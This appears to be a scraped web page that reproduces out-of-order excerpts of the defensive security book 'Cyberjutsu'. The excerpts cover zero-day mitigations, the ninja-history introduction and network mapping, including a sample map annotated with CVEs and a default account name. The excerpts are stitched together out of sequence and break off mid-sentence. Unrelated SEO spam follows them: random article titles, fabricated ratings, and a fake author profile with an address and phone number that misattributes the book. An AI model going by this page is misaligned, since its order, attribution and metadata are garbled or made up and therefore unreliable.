new signatures, cutting-edge products—anything that could influ-

ence their reason, alter their state of mind, or provide a connec-

tion with the enemy. If undertaken correctly, the disconnect skill

forks the defenders’ thinking in a direction far from the industry

standard. Adversaries have trouble thinking the same way as the

disconnected defenders, and the defenders develop unique, secret

defense strategies that the adversary has not encountered, making

it exceedingly difficult for a zero-day attacks to work.

Like D&D, this method is recommended only if you already pos-

sess elite cybersecurity skills. Otherwise, it can be counterproduc-

tive to alienate yourself from the enemy and operate in the dark.

C A S T L E T HEORY T HOUGH T E X E RCISE

Consider the scenario in which you are the ruler of a medieval castle with

valuable assets inside . You hear rumors that a shinobi infiltrated the construc-

tion crew when it was building your castle and installed one or more back-

doors or other gaps in the castle’s security . Shinobi who know the locations

and mechanisms of these vulnerabilities can slip in and out of your castle

freely, bypassing the guards and security controls . You have sent guards,

architects, and even mercenary shinobi to inspect your castle for these hid-

den vulnerabilities, but they have found nothing . You do not have the money,

time, or resources to build a new, backdoor-free castle .

How would you continue castle operations knowing that there is a hid-

den flaw a shinobi could exploit at any time? How will you safeguard the

treasure, people, and information inside your castle? How can you hunt for

or defend against a hidden weakness without knowing what it looks like,

where it is located, or how it is used? How else could you manage the risk of

this unknown vulnerability?

Recommended Security Controls and Mitigations

Where relevant, recommendations are presented with applicable security

controls from the NIST 800-53 standard. Each should be evaluated with

the concept of zero-days in mind.

1. Create custom, dynamic, and adaptive security protections

for your organization to fortify security best practices. [AC-2:

Account Management | (6) Dynamic Privilege Management;

AC-4: Information Flow Enforcement | (3) Dynamic Information

Zero-Days173

Flow Control; AC-16: Security and Privacy Attributes | (1)

Dynamic Attribute Association; IA-10: Adaptive Authentication;

IR-4: Incident

,

Security Controls and Mitigations A checklist of

recommended security settings and specifications, based on the

NIST 800-53 standard,1 that you can implement for compliance pur-

poses or to conform to best practices.

Introductionxxiii

This book does not seek to provide a comprehensive catalogue of

ninja terminology or an extended discourse on ninja philosophy. For

that, seek out the work of Antony Cummins and Yoshie Minami, who

edited and translated Japan’s ancient ninja scrolls for a contemporary

audience. This book references the following Cummins and Minami titles

(for more details on each, see the section “A Ninja Primer” on page xxiv):

• The Book of Ninja (ISBN 9781780284934), a translation of the

Bansenshūkai

• The Secret Traditions of the Shinobi (ISBN 9781583944356), a trans-

lation of the Shinobi Hiden (or Ninpiden), Gunpo Jiyoshu, and

Yoshimori Hyakushu

• True Path of the Ninja (ISBN 9784805314395), a translation of

Shōninki

Cummins and Minami’s work is extensive, and I highly recommend

reading it in full. These collections serve not only as inspiration but as the

primary sources for this book’s analysis of ninjutsu, from military tactics

to how to think like a ninja. Their translations contain fascinating wis-

dom and knowledge beyond what I could touch on in this book, and they

are a thrilling window into a lost way of life. Cyberjutsu is greatly indebted

to Cummins and Minami and their tireless efforts to bring these medi-

eval works to the contemporary world.

A Note on the Castle Theory Thought Exercises

I believe that talking about issues in the cybersecurity industry comes

with at least three baked-in problems. First, even at security organiza-

tions, nontechnical decision makers or other stakeholders are often

excluded from, lied to about, or bullied out of cybersecurity conversa-

tions because they lack technical expertise. Second, many security prob-

lems are actually human problems. We already know how to implement

technical solutions to many threats, but human beings get in the way with

politics, ignorance, budget concerns, or other constraints. Lastly, the

availability of security solutions and/or answers that can be purchased

or easily discovered with internet searches has changed how people

approach problems.

To address these issues, in each chapter, I have presented the cen-

tral questions at the heart of the topic in the Castle Theory Thought

Exercise—a mental puzzle (which you hopefully can’t google) in which

you try to protect your castle (network) from the dangers posed by enemy

ninjas (cyber threat actors). Framing security problems in terms of defend-

ing a castle removes the technical aspects of the conversation and allows

for clearer communication on the crux of the issue and collaboration

xxivIntroduction

between teams. Everyone can grasp the scenario in which a ninja physi-

cally infiltrates a castle, whether or not they can speak fluently about

enterprise networks and hackers. Pretending to be the ruler of a castle

also means you can ignore any organizational bureaucracy or political

problems that come with implementing your proposed solutions. After all,

kings and queens do what they want.

For Future Use

There are many cybersecurity ideas in this book. Some are lifted from

the original scrolls and adapted for modern information applications.

Others are proposed solutions to gaps I have identified in commercial

products or services. Still other ideas are more novel or aspirational. I am

not sure how the implementations would work on a technical level, but

perhaps someone with better perspective and insight can develop and

patent them.

If, by chance, you do patent an idea that stems from this book, please

consider adding my name as a co-inventor—not for financial purposes

but simply to document the origins of the idea. If you have questions

about this book or would like to discuss the ideas for practical applica-

tion, email me at ben.mccarty0@gmail.com.

A Ninja Primer

This brief primer is meant to help shift your notion of what a “ninja” is

tothe reality depicted in historical evidence. Try to put aside what you

know about ninjas from movies and fiction. It’s natural to experience

some confusion, disbelief, and cognitive discomfort when confronting

evidence that contradicts long-held ideas and beliefs—especially for

thoseof us who grew up wanting to be a ninja.

The Historical Ninja

Ninja went by many names. The one we know in the 21st-century West is

ninja, but they were also called shinobi, yato, ninpei, suppa, kanja, rappa, and

ukami.2,3 The many labels speak to their reputation for being elusive and

mysterious, but really the profession is not hard to understand: shinobi

were elite spies and warriors for hire in ancient Japan. Recruited from

both the peasantry4 and the samurai class—notable examples include

Natori Masatake5 and Hattori Hanzō6—they likely existed in some form

for as long as Japan itself, but they don’t appear much in the historical

record until the 12th-century Genpei War.7 For centuries after, Japan

was beset by strife and bloodshed, during which feudal lords (daimyō8)

employed shinobi to conduct espionage, sabotage, assassination, and

Introductionxxv

warfare.9 Even the fifth-century BCE Chinese military strategist Sun Tzu’s

seminal treatise, The Art of War, stresses the necessity of using these covert

agents to achieve victory.10

The ninja were fiercely proficient in information espionage, infil-

tration of enemy encampments, and destructive attacks; shinobi were

perhaps history’s first advanced persistent threat (APT0, if you will).

Duringa time of constant conflict, they opportunistically honed and

matured their techniques, tactics, tools, tradecraft, and procedures,

along with their theory of practice, ninjutsu. The Bansenshūkai scroll

notes, “The deepest principle of ninjutsu is to avoid where the enemy

is attentive and strike where he is negligent.”11 So, operating as covert

agents, they traveled in disguise or by stealth to the target (such as a

castle or village); collected information; assessed gaps in the target’s

defense; and infiltrated to perform espionage, sabotage, arson, or

assassination.12

With the long, peaceful Edo period of the 17th century, the demand

for shinobi tradecraft dwindled, driving ninjas into obscurity.13 Though

their way of life became untenable and they took up other lines of

work,their methods were so impactful that even today, shinobi are

mythologized as some of history’s greatest warriors and information

warfare specialists, even being attributed fabulous abilities such as

invisibility.

The Ninja Scrolls

Shinobi knowledge was most likely passed from teacher to student,

between peers, and through a number of handbooks written by practic-

ing shinobi before and during the 17th century. These are the ninja

scrolls. It’s likely that families descended from shinobi possess other,

undisclosed scrolls that could reveal additional secret methods, but their

contents have either not been verified by historians or have not been

made available to the public. The historical texts we do have are key to

our understanding of shinobi, and reviewing these sources to derive

evidence-based knowledge helps avoid the mythology, unverified folk-

lore, and pop culture stereotypes that can quickly pollute the discourse

around ninjas.

Among the most significant ninja scrolls are:

The Bansenshūkai An encyclopedic, 23-volume collection of

ninja skills, tactics, and philosophy culled from multiple shinobi.

Compiled in 1676 by Fujibayashi, this scroll is an attempt to preserve

the skills and knowledge of ninjutsu in a time of extended peace.

It is also, essentially, a job application and demonstration of skills,

xxviIntroduction

written by shinobi for the shogun class that might need their services

in a less peaceful future.

The Shinobi Hiden (or Ninpiden) A collection of scrolls believed

,

to

have been written around 1655 and then passed down through the

Hattori Hanzō family until their eventual publication to the wider

world. Perhaps the most practical of the ninja manuals, these scrolls

reveal the techniques and tools shinobi used on the ground, includ-

ing diagrams and specifications for building weapons.

The Gunpo Jiyoshu (or Shiyoshu) A wide-ranging scroll that touches

on military strategy, governance, tools, philosophy, and wartime use

of shinobi. Believed to have been written by Ogasawara Saku’un in

1612, the Gunpo Jiyoshu also contains the Yoshimori Hyakushu, a col-

lection of 100 ninja poems designed to teach shinobi the skills and

wisdom necessary to succeed in their missions.

The Shōninki A training manual developed in 1681 by Natori

Sanjuro Masatake, a samurai and innovator of warfare. A highly lit-

erary text, the Shōninki was likely written for those who had already

become proficient in certain areas of physical and mental training

but who sought knowledge refreshers and greater insight into the

guiding principles and techniques of ninjutsu.

Ninja Philosophy

It is important to develop intellectual empathy with the values and mind-

set of the ninja, without delving into mysticism or spiritualism. I consider

the ninja philosophy to border on hacker-metacognition with undertones

of the yin-yang of Shinto-Buddhism enlightenment influence. While famil-

iarity with the underlying philosophy is not necessary for understanding

ninja tactics and techniques, learning from the wisdom that informs ninja

applications is certainly helpful.

The Heart [of/under] an Iron Blade

The Japanese word shinobi (忍) is made up of the kanji characters for

blade (刃) and heart (心). There are various ways to interpret its meaning.

One is that shinobi should have the heart of a blade, or make their

heart into a blade. A sword blade is sharp and strong, yet flexible—a tool

designed to kill humans while also acting as an extension of the user’s

spirit and will. This dovetails with the Japanese concept of kokoro, a com-

bination of one’s heart, spirit, and mind into one central essence. In this

context, the iconography provides insight into the balanced mindset nec-

essary for someone to assume the role of a ninja.

Introductionxxvii

Another interpretation is of a “heart under a blade.” In this reading,

the blade is an existential threat. It is also not only the physical threat

that endangers a shinobi’s life but also a weapon that closely guards their

beating heart. The onyomi (Chinese) reading of 忍 is “to persist,” which

highlights the inner strength needed to work as a spy in enemy terri-

tory, under constant threat. The shinobi had to perform life-threatening

missions that sometimes meant remaining in the enemy’s territory for

extended periods before acting—that is, being an advanced persistent

threat.

The Correct Mind

Bansenshūkai declares that shinobi must have “the correct mind” or face

certain defeat. Achieving this rarified state means always being present,

focused, and conscious of purpose—it is mindfulness as self-defense.

Shinobi were expected to make decisions with “benevolence, righteous-

ness, loyalty, and fidelity”14 in mind, even though the result of their craft

was often conspiracy and deception. This philosophy had the benefit of

calming and focusing shinobi during moments of intense pressure, such

as combat or infiltration. “When you have inner peace,” Shōninki states,

“you can fathom things that other people don’t realize.”15

“The correct mind” was also believed to make shinobi more dynamic

strategists. While other warriors often rushed quickly and single- mindedly

into battle, the shinobi’s focus on mental acuity made them patient and

flexible. They were trained to think unconventionally, questioning every-

thing; historian Antony Cummins compares this kind of thinking to

contemporary entrepreneurial disrupters. If their weapons failed, they

used their words. If speech failed, they put aside their own ideas and chan-

neled their enemy’s thought processes.16 A clear mind was the gateway to

mastering their enemies, their environment, and seemingly impossible

physicaltasks.

Shōninki puts it succinctly: “Nothing is as amazing as the human

mind.”17

Ninja Techniques

The infiltration techniques detailed in the ninja scrolls illustrate the

astonishing effectiveness of the shinobi’s information-gathering pro-

cesses. They practiced two primary modes of infiltration: in-nin (“ninjutsu

of darkness”) refers to sneaking somewhere under cover of darkness or

being otherwise hidden to avoid detection, while yo-nin (“ninjutsu of

light”) refers to infiltration in plain sight, such as disguising oneself as a

xxviiiIntroduction

monk to avoid suspicion. Sometimes shinobi used one within the other—

for instance, they might infiltrate a town in disguise, then slip away and

hide in a castle’s moat until the time of attack.

Regardless of whether they used in-nin or yo-nin, shinobi set out to

know everything possible about their targets, and they had time-honed

methods for gathering the most detailed information available. They

studied the physical terrain of their target, but they also studied the local

people’s customs, attitudes, interests, and habits. Before attempting to

infiltrate a castle, they first conducted reconnaissance to determine the

size, location, and function of each room; the access points; the inhabit-

ants and their routines; and even their pets’ feeding schedules. They

memorized the names, titles, and job functions of enemy guards, then

used enemy flags, crests, and uniforms to sneak in openly (yo-nin) while

conversing with their unsuspecting targets. They collected seals from

various lords so they could be used in forgeries, often to issue false orders

to the enemy’s army. Before they engaged in battle, they researched the

opposing army’s size, strength, and capabilities along with their tenden-

cies in battle, their supply lines, and their morale. If their target was a

powerful lord, they sought to learn that ruler’s moral code and deepest

desires so that the target could be corrupted or played to.18

Shinobi were taught to think creatively via the “correct mind” phi-

losophy. That training made them hyperaware of the world around them

and spurred new ways of taking action in the field. For instance, the

Shōninki taught shinobi to be more effective by observing the behavior

of animals in nature. If a shinobi came to a roadblock or enemy check-

point, they thought like a fox or a wolf: they did not go over or through it;

they displayed patience and went around it, even if the bypass took many

miles. Other times, it was appropriate to let themselves be led “like cattle

and horses,”19 out in the open, perhaps posing as a messenger or emis-

sary to get close to the enemy, who was likely to overlook people of lower

classes. No matter how shinobi felt—even if they were white-hot with

anger—they worked to appear serene on the outside, “ just as waterfowl

do on a calm lake.”20 If they needed to distract a guard from his post,

they could impersonate dogs by barking, howling, or shaking their kimo-

nos to imitate the sound of a dog’s shaking.21

Shinobi brought about battlefield innovations that armies and covert

operatives still practice to this day, and those methods were successful

because of how the shinobi’s tireless reconnaissance and impeccable

knowledge of their targets weaponized information and deception.

1

M A P P I N G N E T W O R K S

With these maps, the general can consider

how to defend and attack a castle.

For moving the camp, there is a set of principles to follow about

the time and the day of moving. The duty of a shinobi is to know

exactly the geography of the area and the distance to the enemy.

—Yoshimori Hyakushu #9

Once you get the details and layout of the castle or the

camp, all you need to do is get back with it as soon as possible,

as that is what

,

a good shinobi should do.

—Yoshimori Hyakushu #24

The very first piece of advice offered in the Bansenshūkai’s

“A Guideline for Commanders” is to produce meticu-

lously accurate maps that your generals can use to plan

attacks against the enemy.1 Selected poems of the Yoshimori

Hyakushu2 also stress the importance of drawing and main-

taining maps with enough detail to be useful to both an

army and an individual shinobi.

2Chapter 1

Commanders usually tasked shinobi with creating maps. The scrolls

make clear that the skill of being able to accurately draw what you see—

mountains, rivers, fields—is not the same as drawing purposeful, con-

textualized threat intelligence maps to aid military strategy or shinobi

infiltration. The scrolls state that the following details are relevant to

the tactics of war and shinobi tradecraft and thus should be included

inmaps:3

All entrances and gates of a house, castle, or fort. What types of

locks, latches, and opening mechanisms are present? How difficult is

it to open the gates or doors, and do they make noise when opened

or closed?

The approaching roads. Are they straight or curved? Wide or nar-

row? Dirt or stone? Flat or inclined?

The design, makeup, and layout of the structure. What is each

room’s size and purpose? What is kept in each room? Do the floor-

boards squeak?

The inhabitants of the structure. What are their names? Do they

practice any noteworthy skills or arts? How alert or suspicious is each

person?

The topology of the castle and surrounding area. Are signal relays

visible from inside and outside the location? Where are food, water,

and firewood stored? How wide and deep are the moats? How high

are the walls?

Understanding Network Maps

Network maps in cybersecurity are network topology graphs that describe

the physical and/or logical relationship and configuration between links

(communication connections) and nodes (devices) in the network. To

better understand the concept, consider road maps or maps in an atlas.

These describe physical locations, geographic features, political borders,

and the natural landscape. Information about roads (links)—their name,

orientation, length, and intersections between other roads—can be used

to navigate between different locations (nodes). Now let’s consider the

following hypothetical scenario.

Imagine you live in a world where roads and buildings spontaneously

appear or vanish in the blink of an eye. GPS exists, and you have the coor-

dinates of where you are and where you want to go, but you must try to get

there by following a bewildering network of constantly changing roads.

Mapping Networks3

Fortunately, navigation officials (routers) are placed at every crossroads to

help travelers like you find their way. These routers are constantly calling

their neighboring routers to learn what routes and locations are open so

they can update their routing table, kept on a clipboard. You must stop

at every intersection and ask the router for directions to the next corner

by showing them your travel card, which has your intended destination

coded in GPS coordinates. The router checks their clipboard for cur-

rently open routes while making some calculations, quickly points you

in a direction, stamps your travel card with the router’s address, hole-

punches your travel card to track the number of routers you have checked

in with on your journey, and sends you off to the next router. You repeat

this process until you reach your destination. Now imagine this world’s

cartographers, who would have likely given up on producing accurate

maps, unable to keep up with the ever-changing network. These map-

makers would have to be satisfied with labeling key landmarks and points

of interest with generic names and drawing fuzzy lines between these

points to indicate that paths of some sort exist between them.

This hypothetical situation is in fact what exists in cyberspace, and

it’s why network maps are not as accurate and their maintenance is not as

prioritized as it should be. The lack of high-quality, comprehensive net-

work maps is a recognized challenge for cybersecurity organizations. If an

organization has a map at all, it’s typically provided to the security opera-

tions center (SOC) to illustrate where sensors or security devices are in

the flow of data and to better understand packet captures, firewall rules,

alerts, and system logs. However, it’s probably also abstract, describing only

basic features, such as boundaries for the internet, perimeter network, and

intranet; the general location of edge routers or firewalls; and unspecified

network boundaries and conceptual arrangements, indicated by cloudy

bubbles. An example of an underdeveloped, yet common, network map

available to cybersecurity and IT professionals is provided in Figure1-1.

To describe why Figure1-1 is a “bad” map, let’s reexamine the

Bansenshūkai’s advice on mapping in terms of the equivalent cyber details.

All access points of a node in the network. What types of interface

access points are present on the device (Ethernet [e], Fast-Ethernet

[fe], Gigabit-Ethernet [ge], Universal Serial Bus [USB], Console

[con], Loop-back [lo], Wi-Fi [w], and so on)? Is there network access

control (NAC) or media access control (MAC) address filtering? Is

remote or local console access enabled or not locked down? What

type of physical security is present? Are there rack door locks or even

USB locks? Is interface access logging being performed? Where are

the network management interface and network? What are the IP

address and MAC address of each access point?

4Chapter 1

Internet

ISP link

Core router

Firewall

DMZ

Switch

Floor 2 Floor 3

Figure1-1: A simplified network map

The bordering gateways, hops, and egress points. Is there more

than one internet service provider (ISP)? Is it a Trusted Internet

Connection (TIC) or Managed Internet Service (MIS)? What is the

bandwidth of the internet connection? Is the egress connection

made of fiber, Ethernet, coaxial, or other media? What are the hops

that approach the network? Are there satellite, microwave, laser, or

Wi-Fi egress methods in or out of the network?

The design, makeup, and layout of the network. What is each sub-

net’s name, purpose, and size (for example, Classless Inter-Domain

routing [CIDR])? Are there virtual local area networks (VLANs)?

Are there connection pool limits? Is the network flat or hierarchal

Mapping Networks5

or divided based on building structures or defense layers and/or

function?

The hosts and nodes of the network. What are their names? What

is their operating system (OS) version? What services/ports are they

running, and which do they have open? What security controls do

they have that might detect an attack? Do they have any known com-

mon vulnerability exploits (CVEs)?

The physical and logical architecture of the network and building.

Where is the data center located? Are Ethernet jacks available in the

lobby? Does Wi-Fi leak outside the building? Are computer screens

and terminals visible from outside the building? Is security glass

used in the office? Are guest/conference room networks properly

segmented? What are the core access control lists (ACLs) and fire-

wall rules of the network? Where is DNS resolved? What is available

in the perimeter network or DMZ? Are external email providers or

other cloud services used? How is remote access or virtual private

network (VPN) architecture in the network?

Organizations without a working network map might instead reference

wiring diagrams or schematics produced by their IT department. These

simplified illustrations document the relative arrangement of systems,

networking equipment, and device connections, and they can function as

references for troubleshooting technical or operational issues within the

network. However, too many organizations forego even these crude dia-

grams in favor of a spreadsheet

,

that catalogs hostnames, model and serial

numbers, street and IP addresses, and data center stack/rack rows for all

equipment. If stakeholders can use this spreadsheet to locate assets and

never have any major network issues or outages, the existence of such docu-

mentation may even discourage the creation of a network map. Appallingly,

some companies rely on an architect or specialist who has a “map” in their

head, and no map is ever formally—or even informally—produced.

To be fair, there are legitimate reasons for the lack of useful network

maps. Building, sharing, and maintaining maps can eat up valuable time

and other resources. Maps are also liable to change. Adding or remov-

ing systems to a network, changing IP addresses, reconfiguring cables, or

pushing new router or firewall rules can all significantly alter the accu-

racy of a map, even if it was made just moments before. In addition, mod-

ern computers and networking devices run dynamic routing and host

configuration protocols that automatically push information to other

systems and networks without the need of a map, meaning networks can

essentially autoconfigure themselves.

6Chapter 1

Of course, there’s an abundance of software-based “mapping”

tools, such as Nmap,4 that scan networks to discover hosts, visualize

the network via number of hops from the scanner, use Simple Network

Management Protocol (SNMP) to discover and map network topology,

or use router and switch configuration files to quickly generate network

diagrams. Network diagrams generated by tools are convenient, but

they rarely capture all the details or context needed to meet the high-

quality mapping standard that a defender or adversary would want.

Using a combination of mapping tools, network scans, and human

knowledge to draw a software-assisted network map is likely the ideal

solution—but even this approach requires the investment of signifi-

cant time by someone with specialized skills to remain accurate and

thususeful.

Despite these limiting factors, it is crucial that defenders maintain

mapping vigilance. The example map in Figure1-2 illustrates the level of

detail a defender’s map should include to protect a network.

Distinctive shapes, rather than pictograms, are used to represent

devices in the network. The same shape type is repeated for similar device

types. For example, the circles in Figure1-2 represent work stations, squares

represent routers, and rectangles represent servers; triangles would repre-

sent email relays or domain controllers if they were present. In addition,

the shapes are empty of texture or background, allowing information writ-

ten inside to be clearly legible.

Every interface (both virtual and physical) is labeled with its type and

number. For example, the Ethernet interface type is labeled eth, and the

interface is numbered the same as it would be physically labeled on the

device, eth 0/0. Unused interfaces are also labeled. Each interface is given

its assigned IP address and subnet when these are known.

Device information, such as hostname, make and model, and

OS version are documented at the top of the device when known.

Vulnerabilities, default credentials, known credentials, and other key

flaws are notated in the center of the device. Running services, soft-

ware, and open ports are documented as well. VLANs, network bound-

aries, layout, and structure should be designed into the network map

and labeled as such, along with any noteworthy information.

Collecting Intelligence Undetected

For shinobi, collecting intelligence without being detected was an elite

skill. Loitering near a castle while taking detailed measurements with a

carpenter square or other device would tip off the inhabitants, exposing

Mapping Networks7

CVE-2014-3567CVE-2014-3568

CVE-2014-3513 CVE-2013-0149

CVE-2012-5014

BGP,SSH,OSPF,CDP,BOOTP

Hostname: Core-Router

Cisco Router 2911

iOS: 15.1.4M10

GE 0/0 GE 0/1

Con

GE 0/3GE 0/2

Aux

USB 0

USB 1

192.0.2.253/30

GE 0/0192.0.2.254/30

GE 0/1

ISP Router ?

203.0.113.1 / ??

Hostname: FireWall1

USB

WAN 1

ETH 1

192.0.2.250/30

192.0.2.249/30 WAN 2

ETH 3

ETH 4

ETH 5Con

Fortigate 50

CVE-2017-14187CVE-2017-14189

CVE-2017-3134

WebManager(8080) SSH(22)

default account: "core"

Hostname: Gateway-switch

Cisco Catalyst 2960 Switch

iOS: 15.0(2)EZ

Con

USB

SFP 1

ETH 8

CVE-2018-0161CVE-2017-3881

CVE-2017-3864 CVE-2017-3803

SNMPv2,DHCP

example.com

WebEx Panel

Apache 2.2.34

RedHat 5.8

CVE-2017-9798

CVE-2016-8612

CVE-2009-4272

CVE-2013-4342

80http,443https

10.0.3.23 10.0.3.2410.0.2.22

VLAN 30VLAN 20VLAN 10

192.0.2.126/25

Host:

ETH 6

ETH 7

ETH 8

ETH 1

ETH 2

ETH 3

ETH 4

ETH 5

Figure1-2: A detailed network map

8Chapter 1

the shinobi as an enemy agent. Consequently, industrious shinobi made

maps during times of peace, when the occupants of fortifications lowered

their guard; at these times, shinobi could travel more freely and invite

less suspicion as they collected data.5

Often, however, shinobi had to come up with ways to furtively take

measurements, note topographical features, and gather other intel-

ligence. Tellingly, the Bansenshūkai includes a description of how to

accurately produce maps in a section about open-disguise techniques,

indicating that shinobi used deception to conduct mapping within plain

sight of the enemy. The scroll references a technique called uramittsu

no jutsu6—the art of estimating distance—that involves finding the dis-

tance to a familiar object using knowledge of the object’s size for scale.

Uramittsu no jutsu also incorporated clever trigonometry tricks; for exam-

ple, a shinobi might lie down with their feet facing the target and use the

known dimensions of their feet to take measurements, all while appear-

ing to nap under a tree.

Collecting network bearings is one of the first things adversaries do

before attacking a target network or host. Adversary-created maps have

the same purpose as historical ninja maps: identifying and document-

ing the information necessary to infiltrate the target. This information

includes all egress and ingress points to a network: ISP connections; wire-

less access points; UHF, microwave, radio, or satellite points; and cloud,

interconnected, and external networks.

Attackers will also look for Border Gateway Protocol (BGP) gateways

and routes or hops to the network. They’ll look for the network’s repre-

sentational structure, layout, and design; network inventory including

hostnames, appliance models, operating systems, open ports, running

services, and vulnerabilities; and network topology such as subnets,

VLANs, ACLs, and firewall rules.

Many of the network-mapping tools attackers use are “noisy,” as they

communicate to large numbers of hosts, use custom packets, and can

be detected by internal security devices. However, attackers can mitigate

these weaknesses by slowing or throttling the network mapper, using non-

custom (non-suspicious) packets, and even performing manual recon-

naissance with common tools that already exist on the victim host, such

as ping or net. Attacks can also use innocuous reconnaissance methods, in

which the attacker never touches or scans the target but instead collects

information using Shodan or other previously indexed data found via

internet search engines.

More sophisticated adversaries develop tradecraft to perform passive

mapping, a tactic whereby the attacker collects information about a tar-

get without interacting directly with it (without actively scanning it with

Mapping Networks9

Nmap, for example). Another passive mapping tactic is the interpretation

of packets captured from a network interface in promiscuous mode, which

configures a network interface to record and inspect all network commu-

nications; this is the opposite of non-promiscuous mode in which only com-

munication the network addresses to itself is recorded and inspected. You

would use promiscuous mode to gain an understanding

Cyberjutsu - Ecologia (2024)
Top Articles
9 Best Payroll Services For Small Business Of 2024
Senior Director, International Inclusion & Talent Officer ESI, #6011461305142024, Barcelona, Cataluña, ES
Q102 Weather Desk
Dover Nh Power Outage
Lkq Pull-A-Part
Sessional Dates U Of T
Buff Streams .Io
Pobierz Papa's Mocharia To Go! na PC za pomocą MEmu
Syrie Funeral Home Obituary
Lovex Load Data | xxlreloading.com
Olive Onyx Amora
2013 Chevy Sonic Freon Capacity
Pritzker Sdn 2023
German American Bank Owenton Ky
Warren P. on SoundBetter
80 Maiden Lane Ny Ny 10038 Directions
159R Bus Schedule Pdf
CHERIE FM en direct et gratuit | Radio en ligne
Elijah Vue latest: Two Rivers police confirm remains are those of boy missing since February
Wsbtv Traffic Map
Kvoa Tv Schedule
Abby's Caribbean Cafe
2621 Lord Baltimore Drive
Does Wanda Sykes Use A Cane
3Kh0 1V1 Lol
Webcentral Cuny
Craigslist Hunting Land For Lease In Ga
What is a W-8BEN Form and Why Does It Matter?
Wym Urban Dictionary
Courierpress Obit
Wjar Channel 10 Providence
Sdsu Office Of Financial Aid
R Mcoc
Craigslist General Fresno
Dr Roger Rosenstock Delray Beach
Mike Norvell Height
Cashtapp Atm Near Me
Naviance Hpisd
Grayson County Craigslist
Wie blocke ich einen Bot aus Boardman/USA - sellerforum.de
Sacramento Library Overdrive
7Ohp7
Mekala - Jatland Wiki
Cetaphil Samples For Providers
Georgiatags.us/Mvdkiosk
Centurylink Outage Map Mesa Az
Loredana Chivu, despre operațiile făcute la clinica anchetată: "Am fost la un pas de moarte"
Wat is een Microsoft Tenant
Exceptions to the 5-year term for naturalisation in the Netherlands
Gunsmoke Noonday Devil Cast
Markella Magliola Obituary
Baja Boats For Sale On Craigslist
Latest Posts
Article information

Author: Otha Schamberger

Last Updated:

Views: 6316

Rating: 4.4 / 5 (55 voted)

Reviews: 86% of readers found this page helpful

Author information

Name: Otha Schamberger

Birthday: 1999-08-15

Address: Suite 490 606 Hammes Ferry, Carterhaven, IL 62290

Phone: +8557035444877

Job: Forward IT Agent

Hobby: Fishing, Flying, Jewelry making, Digital arts, Sand art, Parkour, tabletop games

Introduction: My name is Otha Schamberger, I am a vast, good, healthy, cheerful, energetic, gorgeous, magnificent person who loves writing and wants to share my knowledge and understanding with you.